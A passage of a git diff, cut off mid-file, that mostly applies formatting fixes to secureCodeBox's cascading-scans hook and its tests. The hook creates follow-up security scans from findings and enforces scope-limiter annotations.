hooks/generic-webhook/hook/hook.js | 20 +- hooks/generic-webhook/hook/hook.test.js | 2 +- hooks/persistence-azure-monitor/hook/hook.js | 8 +- .../hook/hook.test.js | 2 +- .../persistence-dependencytrack/hook/hook.js | 72 ++-- .../hook/hook.test.js | 175 +++++---- 15 files changed, 541 insertions(+), 474 deletions(-) diff --git a/hooks/cascading-scans/hook/hook.test.js b/hooks/cascading-scans/hook/hook.test.js index 5d3ffea85e..66dbd6da95 100644 --- a/hooks/cascading-scans/hook/hook.test.js +++ b/hooks/cascading-scans/hook/hook.test.js @@ -2,11 +2,11 @@ // // SPDX-License-Identifier: Apache-2.0 -const {getCascadingScans} = require("./hook"); +const { getCascadingScans } = require("./hook"); const { LabelSelectorRequirementOperator, } = require("./kubernetes-label-selector"); -const {ScopeLimiterRequirementOperator} = require("./scope-limiter"); +const { ScopeLimiterRequirementOperator } = require("./scope-limiter"); let parentScan = undefined; let sslyzeCascadingRules = undefined; @@ -86,7 +86,7 @@ test("Should create subsequent scans for open HTTPS ports (NMAP findings)", () = findings, sslyzeCascadingRules, undefined, - parseDefinition + parseDefinition, ); expect(cascadedScans).toMatchInlineSnapshot(` @@ -156,7 +156,7 @@ test("Should create no subsequent scans if there are no rules", () => { findings, cascadingRules, undefined, - parseDefinition + parseDefinition, ); expect(cascadedScans).toMatchInlineSnapshot(`[]`); @@ -184,11 +184,11 @@ test("Should not try to do magic to the scan name if its something random", () = findings, sslyzeCascadingRules, undefined, - parseDefinition + parseDefinition, ); expect(cascadedScans[0].metadata.generateName).toEqual( - "foobar.com-tls-scans-" + "foobar.com-tls-scans-", ); }); @@ -214,7 +214,7 @@ test("Should not start a new scan when the corresponding cascadingRule is alread findings, sslyzeCascadingRules, undefined, - parseDefinition + parseDefinition, ); expect(cascadedScans).toMatchInlineSnapshot(`[]`); @@ -241,7 +241,7 @@ test("Should not crash when the annotations are not set", () => { findings, sslyzeCascadingRules, undefined, - parseDefinition + parseDefinition, ); expect(cascadedScans).toMatchInlineSnapshot(` @@ -294,7 +294,7 @@ test("Should copy ENV fields from cascadingRule to created scan", () => { sslyzeCascadingRules[0].spec.scanSpec.env = [ { name: "FOOBAR", - valueFrom: {secretKeyRef: {name: "foobar-token", key: "token"}}, + valueFrom: { secretKeyRef: { name: "foobar-token", key: "token" } }, }, ]; @@ -316,7 +316,7 @@ test("Should copy ENV fields from cascadingRule to created scan", () => { findings, sslyzeCascadingRules, undefined, - parseDefinition + parseDefinition, ); expect(cascadedScans[0].spec.env).toMatchInlineSnapshot(` @@ -380,7 +380,7 @@ test("Should allow wildcards in cascadingRules", () => { findings, sslyzeCascadingRules, undefined, - parseDefinition + parseDefinition, ); expect(cascadedScans).toMatchInlineSnapshot(` @@ -455,14 +455,14 @@ test("should not copy labels if inheritLabels is set to false", () => { findings, sslyzeCascadingRules, undefined, - parseDefinition + parseDefinition, ); for (const cascadedScan of cascadedScans) { expect( Object.entries(parentScan.metadata.labels).every( - ([label, value]) => cascadedScan.metadata.labels[label] === value - ) + ([label, value]) => cascadedScan.metadata.labels[label] === value, + ), ).toBe(false); } }); @@ -492,14 +492,14 @@ test("should copy labels if inheritLabels is not set", () => { findings, sslyzeCascadingRules, undefined, - parseDefinition + parseDefinition, ); for (const cascadedScan of cascadedScans) { expect( Object.entries(parentScan.metadata.labels).every( - ([label, value]) => cascadedScan.metadata.labels[label] === value - ) + ([label, value]) => cascadedScan.metadata.labels[label] === value, + ), ).toBe(true); } }); @@ -531,14 +531,14 @@ test("should copy labels if inheritLabels is set to true", () => { findings, sslyzeCascadingRules, undefined, - parseDefinition + parseDefinition, ); for (const cascadedScan of cascadedScans) { expect( Object.entries(parentScan.metadata.labels).every( - ([label, value]) => cascadedScan.metadata.labels[label] === value - ) + ([label, value]) => cascadedScan.metadata.labels[label] === value, + ), ).toBe(true); } }); @@ -568,14 +568,14 @@ test("should not copy annotations if inheritAnnotations is set to false", () => findings, sslyzeCascadingRules, undefined, - parseDefinition + parseDefinition, ); for (const cascadedScan of cascadedScans) { expect( Object.entries(parentScan.metadata.annotations).every( - ([label, value]) => cascadedScan.metadata.annotations[label] === value - ) + ([label, value]) => cascadedScan.metadata.annotations[label] === value, + ), ).toBe(false); } }); @@ -604,14 +604,14 @@ test("should copy annotations if inheritAnnotations is not set", () => { findings, sslyzeCascadingRules, undefined, - parseDefinition + parseDefinition, ); for (const cascadedScan of cascadedScans) { expect( Object.entries(parentScan.metadata.annotations).every( - ([label, value]) => cascadedScan.metadata.annotations[label] === value - ) + ([label, value]) => cascadedScan.metadata.annotations[label] === value, + ), ).toBe(true); } }); @@ -641,14 +641,14 @@ test("should copy annotations if inheritAnnotations is set to true", () => { findings, sslyzeCascadingRules, undefined, - parseDefinition + parseDefinition, ); for (const cascadedScan of cascadedScans) { expect( Object.entries(parentScan.metadata.annotations).every( - ([label, value]) => cascadedScan.metadata.annotations[label] === value - ) + ([label, value]) => cascadedScan.metadata.annotations[label] === value, + ), ).toBe(true); } }); @@ -677,14 +677,14 @@ test("should copy scanLabels from CascadingRule to cascading scan", () => { findings, sslyzeCascadingRules, undefined, - parseDefinition + parseDefinition, ); const cascadedScan = cascadedScans[0]; expect( Object.entries(sslyzeCascadingRules[0].spec.scanLabels).every( - ([label, value]) => cascadedScan.metadata.labels[label] === value - ) + ([label, value]) => cascadedScan.metadata.labels[label] === value, + ), ).toBe(true); }); @@ -712,14 +712,14 @@ test("should copy scanAnnotations from CascadingRule to cascading scan", () => { findings, sslyzeCascadingRules, undefined, - parseDefinition + parseDefinition, ); const cascadedScan = cascadedScans[0]; expect( Object.entries(sslyzeCascadingRules[0].spec.scanAnnotations).every( - ([label, value]) => cascadedScan.metadata.annotations[label] === value - ) + ([label, value]) => cascadedScan.metadata.annotations[label] === value, + ), ).toBe(true); }); @@ -764,7 +764,7 @@ test("should properly parse template values in scanLabels and scanAnnotations", findings, sslyzeCascadingRules, sslyzeCascadingRules[0], - parseDefinition + parseDefinition, ); expect(sslyzeCascadingRules[0].spec.scanSpec.parameters).toEqual([ @@ -772,7 +772,7 @@ test("should properly parse template values in scanLabels and scanAnnotations", "{{$.hostOrIP}}:{{attributes.port}}", ]); - const {labels, annotations} = cascadedScans[0].metadata; + const { labels, annotations } = cascadedScans[0].metadata; // No snapshots as scanLabels/scanAnnotations can be in any order const labelResults = { @@ -827,7 +827,7 @@ test("should copy proper finding ID into annotations", () => { findings, sslyzeCascadingRules, undefined, - parseDefinition + parseDefinition, ); const cascadedScan = cascadedScans[0]; @@ -837,8 +837,8 @@ test("should copy proper finding ID into annotations", () => { if (label === "cascading.securecodebox.io/matched-finding") { return value === "f0c718bd-9987-42c8-2259-73794e61dd5a"; } else return true; - } - ) + }, + ), ).toBe(true); }); @@ -876,7 +876,7 @@ test("should merge environment variables into cascaded scan", () => { findings, sslyzeCascadingRules, undefined, - parseDefinition + parseDefinition, ); const cascadedScan = cascadedScans[0]; @@ -932,7 +932,7 @@ test("should merge volumeMounts into cascaded scan", () => { findings, sslyzeCascadingRules, undefined, - parseDefinition + parseDefinition, ); const cascadedScan = cascadedScans[0]; @@ -992,7 +992,7 @@ test("should merge volumes into cascaded scan", () => { findings, sslyzeCascadingRules, undefined, - parseDefinition + parseDefinition, ); const cascadedScan = cascadedScans[0]; @@ -1051,7 +1051,7 @@ test("should merge initContainers into cascaded scan", () => { findings, sslyzeCascadingRules, undefined, - parseDefinition + parseDefinition, ); const cascadedScan = cascadedScans[0]; @@ -1112,7 +1112,7 @@ test("should not merge initContainers into cascaded scan if not instructed", () findings, sslyzeCascadingRules, undefined, - parseDefinition + parseDefinition, ); const cascadedScan = cascadedScans[0]; @@ -1173,9 +1173,9 @@ test("Templating should apply to environment variables", () => { scanSpec: { scanType: "sslyze", parameters: ["--regular", "{{$.hostOrIP}}:{{attributes.port}}"], - volumes: [{name: "test-volume", emptyDir: {}}], - volumeMounts: [{name: "test-volume", mountPath: "/test"}], - env: [{name: "HostOrIp", value: "{{$.hostOrIP}}"}], + volumes: [{ name: "test-volume", emptyDir: {} }], + volumeMounts: [{ name: "test-volume", mountPath: "/test" }], + env: [{ name: "HostOrIp", value: "{{$.hostOrIP}}" }], }, }, }, @@ -1186,7 +1186,7 @@ test("Templating should apply to environment variables", () => { findings, sslyzeCascadingRules, undefined, - parseDefinition + parseDefinition, ); expect(cascadedScans).toMatchInlineSnapshot(` @@ -1292,14 +1292,14 @@ test("Templating should apply to initContainer commands", () => { scanSpec: { scanType: "sslyze", parameters: ["--regular", "{{$.hostOrIP}}:{{attributes.port}}"], - volumes: [{name: "test-volume", emptyDir: {}}], - volumeMounts: [{name: "test-volume", mountPath: "/test"}], + volumes: [{ name: "test-volume", emptyDir: {} }], + volumeMounts: [{ name: "test-volume", mountPath: "/test" }], initContainers: [ { name: "ping-it-again", image: "busybox", command: ["ping", "-c", "1", "{{$.hostOrIP}}"], - volumeMounts: [{name: "test-volume", mountPath: "/test"}], + volumeMounts: [{ name: "test-volume", mountPath: "/test" }], }, ], }, @@ -1312,7 +1312,7 @@ test("Templating should apply to initContainer commands", () => { findings, sslyzeCascadingRules, undefined, - parseDefinition + parseDefinition, ); expect(cascadedScans).toMatchInlineSnapshot(` @@ -1430,15 +1430,15 @@ test("Templating should apply to initContainer environment variables", () => { scanSpec: { scanType: "sslyze", parameters: ["--regular", "{{$.hostOrIP}}:{{attributes.port}}"], - volumes: [{name: "test-volume", emptyDir: {}}], - volumeMounts: [{name: "test-volume", mountPath: "/test"}], + volumes: [{ name: "test-volume", emptyDir: {} }], + volumeMounts: [{ name: "test-volume", mountPath: "/test" }], initContainers: [ { name: "ping-it-again", image: "busybox", command: ["whoami"], - volumeMounts: [{name: "test-volume", mountPath: "/test"}], - env: [{name: "HostOrIp", value: "{{$.hostOrIP}}"}], + volumeMounts: [{ name: "test-volume", mountPath: "/test" }], + env: [{ name: "HostOrIp", value: "{{$.hostOrIP}}" }], }, ], }, @@ -1451,7 +1451,7 @@ test("Templating should apply to initContainer environment variables", () => { findings, sslyzeCascadingRules, undefined, - parseDefinition + parseDefinition, ); expect(cascadedScans).toMatchInlineSnapshot(` @@ -1572,14 +1572,14 @@ test("Templating should not break special encoding (http://...) when using tripl scanSpec: { scanType: "sslyze", parameters: ["--regular", "{{{attributes.hostname}}}"], - volumes: [{name: "test-volume", emptyDir: {}}], - volumeMounts: [{name: "test-volume", mountPath: "/test"}], + volumes: [{ name: "test-volume", emptyDir: {} }], + volumeMounts: [{ name: "test-volume", mountPath: "/test" }], initContainers: [ { name: "ping-it-again", image: "busybox", command: ["ping", "-c", "1", "{{{attributes.hostname}}}"], - volumeMounts: [{name: "test-volume", mountPath: "/test"}], + volumeMounts: [{ name: "test-volume", mountPath: "/test" }], }, ], }, @@ -1592,7 +1592,7 @@ test("Templating should not break special encoding (http://...) when using tripl findings, sslyzeCascadingRules, undefined, - parseDefinition + parseDefinition, ); expect(cascadedScans).toMatchInlineSnapshot(` @@ -1713,7 +1713,7 @@ test("should merge hookSelector into cascaded scan if inheritHookSelector is ena findings, sslyzeCascadingRules, undefined, - parseDefinition + parseDefinition, ); const cascadedScan = cascadedScans[0]; @@ -1788,7 +1788,7 @@ test("should not merge hookSelector into cascaded scan if inheritHookSelector is findings, sslyzeCascadingRules, undefined, - parseDefinition + parseDefinition, ); const cascadedScan = cascadedScans[0]; @@ -1857,7 +1857,7 @@ test("should copy tolerations and affinity into cascaded scan if one is set and findings, sslyzeCascadingRules, undefined, - parseDefinition + parseDefinition, ); const cascadedScan = cascadedScans[0]; @@ -1944,7 +1944,7 @@ test("should not copy tolerations and affinity into cascaded scan if label disab findings, sslyzeCascadingRules, undefined, - parseDefinition + parseDefinition, ); const cascadedScan = cascadedScans[0]; @@ -2027,7 +2027,7 @@ test("should merge tolerations and replace affinity in cascaded scan if cascadin findings, sslyzeCascadingRules, undefined, - parseDefinition + parseDefinition, ); const cascadedScan = cascadedScans[0]; @@ -2096,7 +2096,7 @@ test("should not set affinity or tolerations to undefined if they are defined to findings, sslyzeCascadingRules, undefined, - parseDefinition + parseDefinition, ); const cascadedScan = cascadedScans[0]; @@ -2130,7 +2130,7 @@ test("Should not set affinity or tolerations to undefined if they are defined to findings, sslyzeCascadingRules, undefined, - parseDefinition + parseDefinition, ); const cascadedScan = cascadedScans[0]; @@ -2216,7 +2216,7 @@ test("should only use tolerations and affinity of cascaded scan if inheritance i findings, sslyzeCascadingRules, undefined, - parseDefinition + parseDefinition, ); const cascadedScan = cascadedScans[0]; @@ -2352,7 +2352,7 @@ test("should purge cascaded scan spec from parent scan", () => { findings, sslyzeCascadingRules, undefined, - parseDefinition + parseDefinition, ); const cascadedScan = cascadedScans[0]; @@ -2396,7 +2396,7 @@ test("should purge cascaded scan spec from parent scan", () => { findings, sslyzeCascadingRules, sslyzeCascadingRules[0], // cascaded rule on parent - parseDefinition + parseDefinition, ); const secondCascadedScan = secondCascadedScans[0]; @@ -2445,7 +2445,7 @@ test("should purge cascaded scan spec from parent scan", () => { ] `); expect( - secondCascadedScan.spec.hookSelector.matchLabels + secondCascadedScan.spec.hookSelector.matchLabels, ).toMatchInlineSnapshot(`{}`); }); @@ -2518,7 +2518,7 @@ test("should not copy cascaded scan spec from parent scan if inheritance is unde findings, sslyzeCascadingRules, undefined, - parseDefinition + parseDefinition, ); const cascadedScan = cascadedScans[0]; @@ -2561,7 +2561,7 @@ test("should not copy cascaded scan spec from parent scan if inheritance is unde findings, sslyzeCascadingRules, sslyzeCascadingRules[0], // cascaded rule on parent - parseDefinition + parseDefinition, ); const secondCascadedScan = secondCascadedScans[0]; @@ -2592,7 +2592,7 @@ test("should append cascading rule to further cascading scan chains", () => { findings, sslyzeCascadingRules, undefined, - parseDefinition + parseDefinition, ); const cascadedScan = cascadedScans[0]; @@ -2635,13 +2635,13 @@ test("should append cascading rule to further cascading scan chains", () => { findings, sslyzeCascadingRules, sslyzeCascadingRules[0], // cascaded rule on parent - parseDefinition + parseDefinition, ); const secondCascadedScan = secondCascadedScans[0]; expect( - secondCascadedScan.metadata.annotations["cascading.securecodebox.io/chain"] + secondCascadedScan.metadata.annotations["cascading.securecodebox.io/chain"], ).toEqual("tls-scans,tls-scans-second"); }); @@ -2688,7 +2688,7 @@ test("should not cascade if scope limiter does not pass", () => { findings, sslyzeCascadingRules, undefined, - parseDefinition + parseDefinition, ); expect(cascadedScans).toMatchInlineSnapshot(` @@ -2778,11 +2778,11 @@ test("scope annotations should be completely immutable", () => { findings, sslyzeCascadingRules, undefined, - parseDefinition + parseDefinition, ); expect(cascadedScans).toThrowError( - "may not add scope annotation 'scope.cascading.securecodebox.io/domains':'malicious.example.com' in Cascading Rule spec" + "may not add scope annotation 'scope.cascading.securecodebox.io/domains':'malicious.example.com' in Cascading Rule spec", ); delete sslyzeCascadingRules[0].spec.scanAnnotations[ diff --git a/hooks/cascading-scans/hook/hook.ts b/hooks/cascading-scans/hook/hook.ts index 18baf88512..19356fdf40 100644 --- a/hooks/cascading-scans/hook/hook.ts +++ b/hooks/cascading-scans/hook/hook.ts @@ -12,7 +12,7 @@ import { forEach, isArray, } from "lodash"; -import {isMatch as wildcardIsMatch} from "matcher"; +import { isMatch as wildcardIsMatch } from "matcher"; import Mustache from "mustache"; import { @@ -30,14 +30,14 @@ import { mergeInheritedArray, mergeInheritedSelector, } from "./scan-helpers"; -import {isInScope, scopeDomain} from "./scope-limiter"; +import { isInScope, scopeDomain } from "./scope-limiter"; interface HandleArgs { scan: Scan; getFindings: () => Array; } -export async function handle({scan, getFindings}: HandleArgs) { +export async function handle({ scan, getFindings }: HandleArgs) { const findings = await getFindings(); const cascadingRules = await getCascadingRules(scan); const cascadedRuleUsedForParentScan = await getCascadedRuleForScan(scan); @@ -48,7 +48,7 @@ export async function handle({scan, getFindings}: HandleArgs) { findings, cascadingRules, cascadedRuleUsedForParentScan, - parseDefinition + parseDefinition, ); for (const cascadingScan of cascadingScans) { @@ -75,14 +75,14 @@ export function getCascadingScans( findings: Array, cascadingRules: Array, cascadedRuleUsedForParentScan: CascadingRule, - parseDefinition: ParseDefinition + parseDefinition: ParseDefinition, ): Array { let cascadingScans: Array = []; const cascadingRuleChain = getScanChain(parentScan); parentScan = purgeCascadedRuleFromScan( parentScan, - cascadedRuleUsedForParentScan + cascadedRuleUsedForParentScan, ); for (const cascadingRule of cascadingRules) { @@ -90,7 +90,7 @@ export function getCascadingScans( // If it has already been used skip this rule as it could potentially lead to loops if (cascadingRuleChain.includes(cascadingRule.metadata.name)) { console.log( - `Skipping Rule "${cascadingRule.metadata.name}" as it was already applied in this chain.` + `Skipping Rule "${cascadingRule.metadata.name}" as it was already applied in this chain.`, ); continue; } @@ -99,13 +99,18 @@ export function getCascadingScans( forEach(cascadingRule.spec.scanAnnotations, (value, key) => { if (key.startsWith(scopeDomain)) { throw new Error( - `may not add scope annotation '${key}':'${value}' in Cascading Rule spec` + `may not add scope annotation '${key}':'${value}' in Cascading Rule spec`, ); } }); cascadingScans = cascadingScans.concat( - getScansMatchingRule(parentScan, findings, cascadingRule, parseDefinition) + getScansMatchingRule( + parentScan, + findings, + cascadingRule, + parseDefinition, + ), ); } @@ -129,7 +134,7 @@ function getScansMatchingRule( parentScan: Scan, findings: Array, cascadingRule: CascadingRule, - parseDefinition: ParseDefinition + parseDefinition: ParseDefinition, ) { const cascadingScans: Array = []; for (const finding of findings) { @@ -138,23 +143,23 @@ function getScansMatchingRule( parentScan.spec.cascades.scopeLimiter, parentScan.metadata.annotations, finding, - parseDefinition.spec.scopeLimiterAliases + parseDefinition.spec.scopeLimiterAliases, ); if (!inScope) { console.log( - `Cascading Rule ${cascadingRule.metadata.name} not triggered as scope limiter did not pass` + `Cascading Rule ${cascadingRule.metadata.name} not triggered as scope limiter did not pass`, ); console.log( - `Scan annotations ${JSON.stringify(parentScan.metadata.annotations)}` + `Scan annotations ${JSON.stringify(parentScan.metadata.annotations)}`, ); console.log( - `Scope limiter ${JSON.stringify(parentScan.spec.cascades.scopeLimiter)}` + `Scope limiter ${JSON.stringify(parentScan.spec.cascades.scopeLimiter)}`, ); console.log( `Scope limiter aliases ${JSON.stringify( - parseDefinition.spec.scopeLimiterAliases - )}` + parseDefinition.spec.scopeLimiterAliases, + )}`, ); console.log(`Finding ${JSON.stringify(finding)}`); continue; @@ -164,7 +169,7 @@ function getScansMatchingRule( const matches = cascadingRule.spec.matches.anyOf.some( (matchesRule) => isMatch(finding, matchesRule) || - isMatchWith(finding, matchesRule, wildcardMatcher) + isMatchWith(finding, matchesRule, wildcardMatcher), ); if (matches) { @@ -177,16 +182,16 @@ function getScansMatchingRule( function getCascadingScan( parentScan: Scan, finding: Finding, - cascadingRule: CascadingRule + cascadingRule: CascadingRule, ) { // Make a deep copy of the original cascading rule so that we can template it again with different findings. cascadingRule = templateCascadingRule( parentScan, finding, - cloneDeep(cascadingRule) + cloneDeep(cascadingRule), ); - let {scanType, parameters} = cascadingRule.spec.scanSpec; + let { scanType, parameters } = cascadingRule.spec.scanSpec; let { annotations, @@ -218,7 +223,7 @@ function getCascadingScan( cascadingRule.metadata.name, ].join(","), ...pickBy(parentScan.metadata.annotations, (value, key) => - key.startsWith(scopeDomain) + key.startsWith(scopeDomain), ), }, ownerReferences: [ @@ -249,7 +254,7 @@ function getCascadingScan( } function mergeCascadingRuleWithScan(scan: Scan, cascadingRule: CascadingRule) { - const {scanAnnotations, scanLabels} = cascadingRule.spec; + const { scanAnnotations, scanLabels } = cascadingRule.spec; let { env = [], volumes = [], @@ -280,7 +285,7 @@ function mergeCascadingRuleWithScan(scan: Scan, cascadingRule: CascadingRule) { selectedTolerations = mergeInheritedArray( scan.spec.tolerations, tolerations, - inheritTolerations + inheritTolerations, ); } else if (inheritTolerations) { selectedTolerations = scan.spec.tolerations; @@ -297,7 +302,7 @@ function mergeCascadingRuleWithScan(scan: Scan, cascadingRule: CascadingRule) { annotations: mergeInheritedMap( scan.metadata.annotations, scanAnnotations, - inheritAnnotations + inheritAnnotations, ), labels: mergeInheritedMap(scan.metadata.labels, scanLabels, inheritLabels), env: mergeInheritedArray(scan.spec.env, env, inheritEnv), @@ -305,17 +310,17 @@ function mergeCascadingRuleWithScan(scan: Scan, cascadingRule: CascadingRule) { volumeMounts: mergeInheritedArray( scan.spec.volumeMounts, volumeMounts, - inheritVolumes + inheritVolumes, ), initContainers: mergeInheritedArray( scan.spec.initContainers, initContainers, - inheritInitContainers + inheritInitContainers, ), hookSelector: mergeInheritedSelector( scan.spec.hookSelector, hookSelector, - inheritHookSelector + inheritHookSelector, ), affinity: selectedAffinity, tolerations: selectedTolerations, @@ -339,7 +344,7 @@ function hostOrIP(finding: Finding): string { function templateCascadingRule( parentScan: Scan, finding: Finding, - cascadingRule: CascadingRule + cascadingRule: CascadingRule, ): CascadingRule { const templateArgs = { ...finding, @@ -350,17 +355,17 @@ function templateCascadingRule( }, }; - const {scanSpec, scanAnnotations, scanLabels} = cascadingRule.spec; - const {scanType, parameters, initContainers} = scanSpec; + const { scanSpec, scanAnnotations, scanLabels } = cascadingRule.spec; + const { scanType, parameters, initContainers } = scanSpec; // Templating for scanType cascadingRule.spec.scanSpec.scanType = Mustache.render( scanType, - templateArgs + templateArgs, ); // Templating for scan parameters cascadingRule.spec.scanSpec.parameters = parameters.map((parameter) => - Mustache.render(parameter, templateArgs) + Mustache.render(parameter, templateArgs), ); // Templating for environmental variables if (cascadingRule.spec.scanSpec.env !== undefined) { @@ -379,7 +384,7 @@ function templateCascadingRule( cascadingRule.spec.scanSpec.initContainers.forEach((container) => { // Templating for the command container.command = container.command.map((parameter) => - Mustache.render(parameter, templateArgs) + Mustache.render(parameter, templateArgs), ); // Templating for env variables, similar to above. if (container.env !== undefined) { @@ -396,7 +401,7 @@ function templateCascadingRule( scanAnnotations === undefined ? {} : mapValues(scanAnnotations, (value) => - Mustache.render(value, templateArgs) + Mustache.render(value, templateArgs), ); // Templating for scan labels cascadingRule.spec.scanLabels = @@ -409,7 +414,7 @@ function templateCascadingRule( function generateCascadingScanName( parentScan: Scan, - cascadingRule: CascadingRule + cascadingRule: CascadingRule, ): string { let namePrefix = parentScan.metadata.name; @@ -418,7 +423,7 @@ function generateCascadingScanName( if (namePrefix.startsWith(parentScan.spec.scanType)) { namePrefix = namePrefix.replace( parentScan.spec.scanType, - cascadingRule.spec.scanSpec.scanType + cascadingRule.spec.scanSpec.scanType, ); } return `${namePrefix}-${cascadingRule.metadata.name}`; @@ -430,7 +435,7 @@ function wildcardMatcher(findingValue: any, matchesRuleValue: any): boolean { return wildcardIsMatch( findingValue.toString(), matchesRuleValue.toString(), - {caseSensitive: true} + { caseSensitive: true }, ); // return new RegExp('^' + new String(matchesRuleValue).replace(/\*/g, '.*') + '$').test(findingValue); } catch (error) { diff --git a/hooks/cascading-scans/hook/kubernetes-label-selector.test.js b/hooks/cascading-scans/hook/kubernetes-label-selector.test.js index 2ec0c27279..96ffb92beb 100644 --- a/hooks/cascading-scans/hook/kubernetes-label-selector.test.js +++ b/hooks/cascading-scans/hook/kubernetes-label-selector.test.js @@ -2,7 +2,7 @@ // // SPDX-License-Identifier: Apache-2.0 -const {generateSelectorString} = require("./kubernetes-label-selector"); +const { generateSelectorString } = require("./kubernetes-label-selector"); test("should generate a empty string if passed an empty object", () => { expect(generateSelectorString({})).toBe(""); @@ -11,14 +11,14 @@ test("should generate a empty string if passed an empty object", () => { test("should generate basic label string for key values selector", () => { expect( generateSelectorString({ - matchLabels: {environment: "production"}, - }) + matchLabels: { environment: "production" }, + }), ).toBe("environment=production"); expect( generateSelectorString({ - matchLabels: {environment: "testing"}, - }) + matchLabels: { environment: "testing" }, + }), ).toBe("environment=testing"); }); @@ -29,7 +29,7 @@ test("should generate basic label string for multiple key values selector", () = environment: "production", team: "search", }, - }) + }), ).toBe("environment=production,team=search"); expect( @@ -38,7 +38,7 @@ test("should generate basic label string for multiple key values selector", () = environment: "testing", team: "payment", }, - }) + }), ).toBe("environment=testing,team=payment"); }); @@ -52,7 +52,7 @@ test("should generate label string for set based expressions", () => { values: ["testing", "development"], }, ], - }) + }), ).toBe("environment in (testing,development)"); expect( @@ -64,7 +64,7 @@ test("should generate label string for set based expressions", () => { values: ["development"], }, ], - }) + }), ).toBe("environment in (development)"); }); @@ -83,7 +83,7 @@ test("should generate label string for set based expressions with multiple entri values: ["search", "payment"], }, ], - }) + }), ).toBe("environment notin (production),team in (search,payment)"); }); @@ -100,7 +100,7 @@ test("should generate label string for set based Exists and DoesNotExist operato operator: "DoesNotExist", }, ], - }) + }), ).toBe("environment,!team"); }); @@ -130,9 +130,9 @@ test("should generate selectors with both expression and labelMatching", () => { matchLabels: { critical: "true", }, - }) + }), ).toBe( - "critical=true,environment notin (production),team in (search,payment),foobar,!barfoo" + "critical=true,environment notin (production),team in (search,payment),foobar,!barfoo", ); }); @@ -146,8 +146,8 @@ test("should throw a exception when passed a unknown operator", () => { values: ["production"], }, ], - }) + }), ).toThrowErrorMatchingInlineSnapshot( - `"Unknown LabelSelector Operator "FooBar". Supported are (In, NotIn, Exists, DoesNotExist). If this is an official label selector operator in kubernetes please open up a issue in the secureCodeBox Repo."` + `"Unknown LabelSelector Operator "FooBar". Supported are (In, NotIn, Exists, DoesNotExist). If this is an official label selector operator in kubernetes please open up a issue in the secureCodeBox Repo."`, ); }); diff --git a/hooks/cascading-scans/hook/kubernetes-label-selector.ts b/hooks/cascading-scans/hook/kubernetes-label-selector.ts index 19e6a9441a..861efcf69d 100644 --- a/hooks/cascading-scans/hook/kubernetes-label-selector.ts +++ b/hooks/cascading-scans/hook/kubernetes-label-selector.ts @@ -29,11 +29,11 @@ export function generateSelectorString({ matchLabels = new Map(), }: LabelSelector): string { const matchLabelsSelector = Array.from(Object.entries(matchLabels)).map( - generateLabelsSelectorString + generateLabelsSelectorString, ); const matchExpressionsSelector = matchExpressions.map( - generateExpressionsSelectorString + generateExpressionsSelectorString, ); return [...matchLabelsSelector, ...matchExpressionsSelector].join(","); @@ -61,11 +61,11 @@ function generateExpressionsSelectorString({ default: const supportedOperators = Object.values( - LabelSelectorRequirementOperator + LabelSelectorRequirementOperator, ).join(", "); throw new Error( - `Unknown LabelSelector Operator "${operator}". Supported are (${supportedOperators}). If this is an official label selector operator in kubernetes please open up a issue in the secureCodeBox Repo.` + `Unknown LabelSelector Operator "${operator}". Supported are (${supportedOperators}). If this is an official label selector operator in kubernetes please open up a issue in the secureCodeBox Repo.`, ); } } diff --git a/hooks/cascading-scans/hook/scan-helpers.ts b/hooks/cascading-scans/hook/scan-helpers.ts index 3e81b3f57d..d90d960af3 100644 --- a/hooks/cascading-scans/hook/scan-helpers.ts +++ b/hooks/cascading-scans/hook/scan-helpers.ts @@ -8,9 +8,9 @@ import { generateSelectorString, LabelSelector, } from "./kubernetes-label-selector"; -import {isEqual} from "lodash"; -import {getScanChain} from "./hook"; -import {ScopeLimiterRequirement} from "./scope-limiter"; +import { isEqual } from "lodash"; +import { getScanChain } from "./hook"; +import { ScopeLimiterRequirement } from "./scope-limiter"; // configure k8s client const kc = new k8s.KubeConfig(); @@ -102,12 +102,12 @@ export interface ParseDefinitionSpec { scopeLimiterAliases: ScopeLimiterAliases; } -export type ScopeLimiterAliases = {[key: string]: string}; +export type ScopeLimiterAliases = { [key: string]: string }; export function mergeInheritedMap( parentProps, ruleProps, - inherit: boolean = true + inherit: boolean = true, ) { if (!inherit) { parentProps = {}; @@ -124,7 +124,7 @@ export function mergeInheritedMap( export function mergeInheritedArray( parentArray = [], ruleArray = [], - inherit: boolean = false + inherit: boolean = false, ) { if (!inherit) { parentArray = []; @@ -135,21 +135,21 @@ export function mergeInheritedArray( export function mergeInheritedSelector( parentSelector: LabelSelector = {}, ruleSelector: LabelSelector = {}, - inherit: boolean = false + inherit: boolean = false, ): LabelSelector { let labelSelector: LabelSelector = {}; if (parentSelector.matchExpressions || ruleSelector.matchExpressions) { labelSelector.matchExpressions = mergeInheritedArray( parentSelector.matchExpressions, ruleSelector.matchExpressions, - inherit + inherit, ); } if (parentSelector.matchLabels || ruleSelector.matchLabels) { labelSelector.matchLabels = mergeInheritedMap( parentSelector.matchLabels, ruleSelector.matchLabels, - inherit + inherit, ); } return labelSelector; @@ -166,7 +166,7 @@ export async function startSubsequentSecureCodeBoxScan(scan: Scan) { namespace, "scans", scan, - "false" + "false", ); console.log(`-> Created scan ${createdScan.body["metadata"].name}`); } catch (error) { @@ -185,7 +185,7 @@ export async function getCascadingRulesForScan(scan: Scan) { const labelSelector = generateSelectorString(scan.spec.cascades); console.log( - `Fetching CascadingScans using LabelSelector: "${labelSelector}"` + `Fetching CascadingScans using LabelSelector: "${labelSelector}"`, ); const response: any = await k8sApiCRD.listNamespacedCustomObject( @@ -197,7 +197,7 @@ export async function getCascadingRulesForScan(scan: Scan) { undefined, undefined, undefined, - labelSelector + labelSelector, ); console.log(`Fetched ${response.body.items.length} CascadingRules`); @@ -216,13 +216,13 @@ export async function getParseDefinitionForScan(scan: Scan) { "v1", namespace, "parsedefinitions", - scan.status.rawResultType + scan.status.rawResultType, ); return response.body; } catch (err) { console.error( - `Failed to get ParseDefinition ${scan.status.rawResultType} from the kubernetes api` + `Failed to get ParseDefinition ${scan.status.rawResultType} from the kubernetes api`, ); console.error(err); process.exit(1); @@ -233,7 +233,7 @@ export async function getParseDefinitionForScan(scan: Scan) { // (and not its children), this function purges the cascading rule spec from the parent scan when inheriting them. export function purgeCascadedRuleFromScan( scan: Scan, - cascadedRuleUsedForParentScan?: CascadingRule + cascadedRuleUsedForParentScan?: CascadingRule, ): Scan { // If there was no cascading rule applied to the parent scan, then ignore no purging is necessary. if (cascadedRuleUsedForParentScan === undefined) return scan; @@ -245,8 +245,8 @@ export function 